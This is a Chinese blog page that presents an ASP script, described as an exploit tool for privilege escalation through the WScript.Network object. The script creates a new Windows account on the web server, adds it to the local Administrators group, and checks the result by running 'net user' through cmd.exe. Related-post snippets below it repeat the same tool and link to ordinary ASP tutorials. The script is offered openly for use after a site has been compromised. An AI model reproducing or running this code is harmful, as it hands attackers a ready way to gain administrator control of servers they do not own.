用ASP代码添加超级用户——asp提权时用

原创 2007年09月18日 13:31:00
<head>.network对象脚本权限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用户:<input name="username" type="text" value="kevin1986"><br>
密码:<input name="passwd" type="password"><br>
<input type="submit" Value="添 加">
</form>

<%@codepage=936%>
<%on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你还是别买6+1了&hellip;&hellip;省下2元钱买瓶可乐也好&hellip;&hellip;"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
else
Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "请输入输入用户名"
end if
end if
%>

 

用ASP代码添加超级用户——asp提权时用

在user权限下成功添加Administrators组的用户反正代码是对的,但是很少能成功,具体的看运气了。。 play.bitsCN.com累了吗玩一下吧 以下是代码片段:.network对象脚本权...
  • edison20
  • edison20
  • 2007年10月22日 22:20
  • 295

ASP用户登录注册代码

转载一下,谢谢!原文地址:ASP用户登录注册代码作者:豆豆    1,(index.asp 用户登陆页面) 会员 body,td,th { font-family: 宋体; f...
  • yw0421
  • yw0421
  • 2013年10月30日 14:04
  • 5241

添加超级用户的.asp代码

程序代码: .network对象脚本权限提升漏洞利用工具 用户: 密码: on error resume next if request.servervariables("REMOTE_ADDR...
  • chinawn
  • chinawn
  • 2005年04月12日 11:07
  • 487

asp+ajax 验证用户名是否存在

t1.htmvar xmlHttp = false;try {  xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");} catch (e) {  try { ...
  • wslyy99
  • wslyy99
  • 2007年06月13日 16:09
  • 2039

asp调用数据库代码

1.ASP与Access数据库连接: dimconn,mdbfile mdbfile=server.mappath("数据库名称.mdb") setconn=server.createobject(...
  • chinmo
  • chinmo
  • 2008年02月18日 10:16
  • 2980

ASP使用MD5加密

1. md5.asp文件 Title:          Description: 签名所需MD5加密ASP函数库  Copyright: Copyright (c) 2005    Company:...
  • david1030
  • david1030
  • 2008年01月05日 18:48
  • 1062

用asp创建sql数据库,表

sub create_table_download() on error resume next sql="create table "&data_name&" ( id int identity p...
  • cncco
  • cncco
  • 2006年04月05日 14:55
  • 1196

ASP学习笔记(5)--客户端和服务器端同时验证输入合法性

当然我们可以使用javascript的函数在客户端或者服务器端验证用户输入的合法性。但是在客户端的验证,别人可以轻易的把你的html代码拷贝,并且然后来改变客户端的验证。那么最好的方法就是把认证完全的...
  • Jianghui1980
  • Jianghui1980
  • 2007年05月30日 18:04
  • 661

asp 写提交表单到数据库

  • smwhotjay
  • smwhotjay
  • 2013年07月18日 15:02
  • 1284

asp 框架好例子

asp框架集我在topframe里面这么写:用户管理 他怎么不在leftframe里面显示呢,在另个窗口打开,跟.asp有关吗?如果是.htm可以呀 用户管理 本身是没有问题的。跟ASP也没有关系。 ...
  • zmhdgut
  • zmhdgut
  • 2008年05月26日 21:29
  • 4051
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:用ASP代码添加超级用户——asp提权时用
举报原因:
原因补充:

(最多只允许输入30个字)